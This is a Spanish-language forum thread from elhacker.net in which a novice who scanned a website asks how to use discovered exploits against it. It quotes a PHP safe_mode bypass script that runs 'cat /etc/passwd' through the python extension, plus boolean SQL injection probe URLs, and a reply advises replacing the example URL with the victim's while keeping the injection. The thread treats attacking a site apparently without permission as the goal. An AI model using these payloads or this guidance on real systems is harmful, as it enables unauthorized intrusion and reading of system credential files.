elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
14 Marzo 2010, 12:26  


Temas destacados: Wallpaper mensual Marzo


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderadores: Anon, berz3k)
| | |-+  ¿como devieria continuar?		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Imprimir
Autor Tema: ¿como devieria continuar?  (Leído 683 veces)
storm_shadow24

Desconectado Desconectado

Mensajes: 4


Ver Perfil
¿como devieria continuar?
« en: 12 Diciembre 2009, 12:50 »
Hola a todos... bueno recien empiezo con esto del hack, anteriormente estaba en eso del cracking pero ahora me intersa mucho sobre exploits, lei bastante y bueno he estado usando el SSS (shadow security scaner) para ver los bugs de una pagina y me dieron como 17 para ser exactos... bueno amigos queria pedirles que me guien... aqui voy...

una de las vulnerabilidades es esta:

1.- http://www.securityfocus.com/bid/29936/info (no pongo el exploit por que es largo, pero se muestra en la pestaña exploit de la pagina)

2.-http://www.securityfocus.com/bid/32902 el exploit que me das es este:

Citar
<?php
/*
  php_python_bypass.php
  php python extension safe_mode bypass
  Amir Salmani - amir[at]salmani[dot]ir
*/

//python ext. installed?
if (!extension_loaded('python')) die("python extension is not installed\n");

//eval python code
$res = python_eval('
import os
pwd = os.getcwd()
print pwd
os.system('cat /etc/passwd')
');

//show result
echo $res;
?>

3.-  luego tambien este es otro exploit que no logro entender:

Citar
http://www.example.com/demo/index.php?id=511 y substring (@ @ versión, 1,1) = 5
http://www.example.com/demo/index.php?id=511 and 1=1 http://www.example.com/demo/index.php?id=511 y 1 = 1
http://www.example.com/demo/index.php?id=511 and substring(@@version,1,1)=4 http://www.example.com/demo/index.php?id=511 y substring (@ @ versión, 1,1) = 4
http://www.example.com/demo/index.php?id=511 and 1=2 http://www.example.com/demo/index.php?id=511 y 1 = 2



Por favaor quisiera que alguien me ayude como usarlo... estuve leyendo para la compilacion en c++ y esta probando pero no se como guardar ni como usarlo como ejecutable... alguna ayuda porfavor...
MUCHAS GRACIAS DE ANTEMANO....
En línea
wisehacks

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: ¿como devieria continuar?
« Respuesta #1 en: 12 Diciembre 2009, 13:51 »
No puedes compilarlo en C++ porque esos exploits que has puesto no son código C++. El primero es PHP y lo segundo es un SQL injection.

En el primero tienes que tener acceso al servidor, y sirve para evadir el safe_mode de PHP. Te sería útil por ejemplo en entornos de shared hosting donde tienes una web y puedes subir tu código o en servidores con RFI o que hayas comprometido de antemano.

Para el segundo, te recomiendo que te leas algo sobre SQL injection, hay muy buenos tutoriales en este foro, y en google. Básicamente deberías cambiar la URL que te da el exploit por la de tu víctima, manteniendo la parte de la inyección SQL.

Espero haberte ayudado, pero creo que te has saltado muchos pasos previos a explotar vulnerabilidades.
En línea
storm_shadow24

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: ¿como devieria continuar?
« Respuesta #2 en: 13 Diciembre 2009, 03:15 »
Cita de: wisehacks en 12 Diciembre 2009, 13:51
No puedes compilarlo en C++ porque esos exploits que has puesto no son código C++. El primero es PHP y lo segundo es un SQL injection.

En el primero tienes que tener acceso al servidor, y sirve para evadir el safe_mode de PHP. Te sería útil por ejemplo en entornos de shared hosting donde tienes una web y puedes subir tu código o en servidores con RFI o que hayas comprometido de antemano.

Para el segundo, te recomiendo que te leas algo sobre SQL injection, hay muy buenos tutoriales en este foro, y en google. Básicamente deberías cambiar la URL que te da el exploit por la de tu víctima, manteniendo la parte de la inyección SQL.

Espero haberte ayudado, pero creo que te has saltado muchos pasos previos a explotar vulnerabilidades.

En la primera parte en el exploit de php... ya lo compile... pero como lo ajecuto contra la web que he escaneado...?
En línea
Anon
Estudiante y
Moderador
*****
Desconectado Desconectado

Mensajes: 1.868


Anonymous & Paranoid


Ver Perfil WWW
Re: ¿como devieria continuar?
« Respuesta #3 en: 18 Diciembre 2009, 06:05 »
La mayoria de las veces el SSS, te arroja errores genéricos que pueden estar en mil sistemas distintos.

Seria de tratar de comprobar manualmente si la pagina es vulnerable o no.

Para eso un scaner de vulnerabilidades no te va a ayudar mucho, pueden salirte 17 o 512 errores, y en realidad solo necesitas conocer como explotar uno para llevarte toda la web.
En línea
En la escuela "Temporada Baja"

Blog stack and heap
Mi Windows Live Space
Mi Twitter
Mi Canal Youtube

no free software, no free bugs
Páginas: [1] Ir Arriba Imprimir 
Ir a:  





Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

Yashira.org    Videojuegos    indetectables.net    Seguridad Informatica Colombia    Indejuegos    Internet móvil

Noticias Informatica    Seguridad Informática    ADSL    eNYe Sec    Seguridad Wireless    Underground México    Biblioteca de Seguridad

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.11 | SMF © 2006-2008, Simple Machines LLC